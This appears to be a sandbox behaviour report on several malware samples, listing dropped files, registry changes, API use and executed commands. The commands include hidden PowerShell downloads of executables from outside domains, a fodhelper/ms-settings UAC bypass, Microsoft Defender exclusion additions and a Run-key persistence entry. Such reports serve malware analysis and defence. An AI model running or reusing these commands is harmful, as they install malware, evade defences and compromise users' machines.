c:\47f2.tmp\ÈÒÎÃ.bat Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\public\libraries\config.json Generic Write,Read Attributes
c:\users\public\libraries\config.json Synchronize,Write Attributes
c:\users\public\libraries\svchost.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\public\libraries\svchost.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_13x2ay40.dxx.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_4clnculs.v4s.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_4eok13rs.ezs.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_502surqg.in2.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_b5nhrh2h.2gn.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_be2nb2hi.yj4.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_c4wxmli5.jlz.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_d2uqfkbm.b30.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ejgtsinr.y41.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_exshymzz.5wl.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_fi1dsmiz.zii.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ir1hzpd5.2c0.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_jxu20arf.5im.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_k0rdyisr.5j4.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_lwuy2znm.i30.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_lzoj0iwm.j4u.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_n4ncuyly.cgp.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_oecifclt.osb.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_owtgqofe.53l.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_peuaowrr.w43.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_sygyotlw.twh.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_tidom4ic.qdt.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_tjzehqpq.ubq.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_yazac4sh.y3o.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_zfexr2al.g0s.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_zv35vjga.cwa.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\msi2fe1.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\msi432a0.log Generic Write,Read Attributes
c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe Generic Write,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe Generic Write,Read Data,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe Read Attributes,Synchronize,Write Data
c:\users\user\appdata\local\temp\vcpkg\vcpkge09bc766-dbad-4163-8882-9ef5df4a2b81.txt Generic Write,Read Attributes
c:\users\user\appdata\local\vcpkg\config Generic Write,Read Attributes
c:\users\user\appdata\roaming\ob\windows local.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\windows\temp\15293484.ps1 Generic Write,Read Attributes
c:\windows\temp\15298859.ps1 Generic Write,Read Attributes
c:\windows\temp\2155015.ps1 Generic Write,Read Attributes
c:\windows\temp\2160328.ps1 Generic Write,Read Attributes
c:\windows\temp\debug_log.txt Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\software\wow6432node\microsoft\windows nt\currentversion\systemrestore::systemrestorepointcreationfrequency RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⬃뗸䮮ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 귄풾啺ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 풷퓅啺ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 핳啺ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䊿핶啺ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 꿣ȁ獖} RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe @岿棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 擝峁棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 嵥棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䞬嵨棻ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 溹嵯棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\windowspowershell\v1.0\powershell.exe 縭巀棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 巡棻ǜ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filedirectory %windir%\tracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filedirectory %windir%\tracing RegNtPreCreateKey
HKCU\ms-settings\shell\open\command:: "C:\Users\Public\Libraries\svchost.exe" RegNtPreCreateKey
HKCU\ms-settings\shell\open\command::delegateexecute RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer::slowcontextmenuentries RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\content::cacheprefix RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\cookies::cacheprefix Cookie: RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\history::cacheprefix Visited: RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 쉝琡泻ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 桏⬉ʾ먎Í䈛x茣ǧ䠱O噀ñ뽹ɞ傄ë횎ǜɼ鶝’꾢ʊ캱˜閾ʴ淃⟋ʪ柏ũߙĤᯢV⣳ġjᰂŁ鈄Ğ鍂€ꩠŖ窵ň RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 桐⬉ʾꄍ먎Í䈛x茣ǧ䠱O噀ñ뽹ɞ傄ë횎ǜɼ鶝’꾢ʊ캱˜閾ʴ淃⟋ʪ柏ũߙĤᯢV⣳ġjᰂŁ鈄Ğ鍂€ꩠŖ窵ň RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 騿琹泻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 姊璛泻ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⏶쁣紽ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::obwallet C:\Users\Ymoxotlr\AppData\Roaming\ob\Windows local.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 빇듂製ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings::enablenegotiate  RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ⇺訖ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䞀⇽訖ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 졯⋀訖ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⪖⋃訖ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 뚾蹸ꛗǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 昛躉ꛗǜ RegNtPreCreateKey
HKLM\system\controlset001\control\ci\policy::vulnerabledriverblocklistenable RegNtPreCreateKey
HKLM\system\controlset001\control\ci\policy::driverblocklistenable RegNtPreCreateKey
HKLM\system\controlset001\control\ci\config::vulnerabledriverblocklistenable RegNtPreCreateKey
HKLM\system\controlset001\control\ci\config::driverblocklistenable RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 꿖軴ꛗǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::obwallet C:\Users\Fwcujizw\AppData\Roaming\ob\Windows local.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ᐐᯛ꣍ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 牓᰺꣍ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㖾᰿꣍ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 烅꜊옚ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 烅꜊옚ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ܕꞣ옚ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 楮ꞥ옚ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe Ɪ옚ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 㩺䟆쨪ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 衫䟔쨪ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䟖쨪ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 騘䟧쨪ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAdjustPrivilegesToken
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAllocateReserveObject
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreatePortSection
  • ntdll.dll!NtAlpcCreateResourceReserve
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcQueryInformationMessage
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssignProcessToJobObject
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelIoFileEx
  • ntdll.dll!NtCancelTimer2
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateJobObject
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateUserProcess
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetCompleteWnfStateSubscription
  • ntdll.dll!NtGetContextThread
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtLockFile
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtPowerInformation
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryInstallUILanguage
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation

174 additional items are not displayed above.

Network Winsock2
  • WSASocket
  • WSAStartup
  • WSAttemptAutodialName
Network Winsock
  • accept
  • bind
  • closesocket
  • connect
  • freeaddrinfo
  • getaddrinfo
  • getsockname
  • recv
  • send
  • setsockopt
  • socket
Process Shell Execute
  • CreateProcess
  • ShellExecute
  • ShellExecuteEx
  • WriteConsole
Anti Debug
  • CheckRemoteDebuggerPresent
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetComputerName
  • GetComputerNameEx
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Encryption Used
  • BCryptOpenAlgorithmProvider
Other Suspicious
  • AdjustTokenPrivileges
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Terminate
  • TerminateProcess
Network Wininet
  • HttpOpenRequest
  • HttpQueryInfo
  • HttpSendRequest
  • InternetConnect
  • InternetOpen
  • InternetOpenUrl
  • InternetReadFile
  • InternetSetOption
Network Winhttp
  • WinHttpConnect
  • WinHttpOpen
  • WinHttpOpenRequest
  • WinHttpReceiveResponse
  • WinHttpSendRequest
Network Info Queried
  • GetNetworkParams
Cert Store Read
  • CertOpenStore
Network Urlomon
  • URLDownloadToFile

Shell Command Execution

C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\36f6413bd3ca800dfc66725d52421babc85b9619_0000793088.,LiQMAxHB
"\47F2.tmp\����.bat"
C:\WINDOWS\system32\chcp.com chcp 65001
C:\WINDOWS\system32\reg.exe Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
C:\WINDOWS\system32\reg.exe Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
C:\WINDOWS\system32\reg.exe Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\0bf30a10a614207d27df8c8fc8e7b50853a52cc4_0000793088.,LiQMAxHB
"C:\Users\Blotfgdv\AppData\Local\Temp\vcpkg\vcpkg-2020.11.12.exe" x-upload-metrics "C:\Users\Blotfgdv\AppData\Local\Temp\vcpkg\vcpkge09bc766-dbad-4163-8882-9ef5df4a2b81.txt"
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\819ce40e357612584bd690fc220921b9d4a8431a_0002931200.,LiQMAxHB
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://frozi.cc/Stb/Retev.php?bl=RbAFzBhyyCMuMHbMdPLCW013.txt' -OutFile $env:APPDATA\BK245535.exe
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\7107fd33026804fb7da9494d952a46d036f49200_0000828928.,LiQMAxHB
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK707028.exe
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\075ce8c6a8190bfa4f9facbb57cdc728e7ba52ea_0000828928.,LiQMAxHB
(NULL) fodhelper.exe
open ms-settings:optionalfeatures
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\15298859.ps1"
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\15293484.ps1"
msiexec.exe /i C:\Users\Vdwyojnp\AppData\Local\Temp\MSI2FE1.tmp
C:\WINDOWS\system32\tasklist.exe "tasklist"
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\b93dc317de9e6f50f25d83df63c6d107591118d1_0000793088.,LiQMAxHB
open powershell.exe -Command "Add-MpPreference -ExclusionPath "C:\Users\Ymoxotlr\AppData\Roaming\ob\" -Force"
open C:\Users\Ymoxotlr\AppData\Roaming\ob\Windows local.exe
open cmd.exe /C powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Ymoxotlr\AppData\Roaming\ob' -ErrorAction SilentlyContinue" >nul 2>&1
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=yQbDrnzZVH6cCtokqOPRE001.txt' -OutFile $env:TEMP\BK396126.exe
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\96c7077d1b99dca84e7f3b5a89e58cb608153ac0_0000843776.,LiQMAxHB
WriteConsole: (NULL)
WriteConsole:
WriteConsole: __ _______
WriteConsole: \ \/ /___ /
WriteConsole: \ / |_ \
WriteConsole: / \ ___) |
WriteConsole: /_/\_\____/
WriteConsole: X3 SOLUTIONS
WriteConsole: External Loader
WriteConsole: ----------------------------------------
WriteConsole: Username:
C:\WINDOWS\system32\getmac.exe getmac
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\2160328.ps1"
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\2155015.ps1"
open powershell.exe -Command "Add-MpPreference -ExclusionPath "C:\Users\Fwcujizw\AppData\Roaming\ob\" -Force"
open C:\Users\Fwcujizw\AppData\Roaming\ob\Windows local.exe
open cmd.exe /C powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Fwcujizw\AppData\Roaming\ob' -ErrorAction SilentlyContinue" >nul 2>&1
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Fwcujizw\AppData\Roaming\ob' -ErrorAction SilentlyContinue"
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\d661cd9180fefffa8ab4fd42ba8695b485944458_0000856576.,LiQMAxHB
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK216633.exe
C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt' -OutFile $env:TEMP\BK598146.exe
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c cls
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt' -OutFile $env:TEMP\BK598146.exe
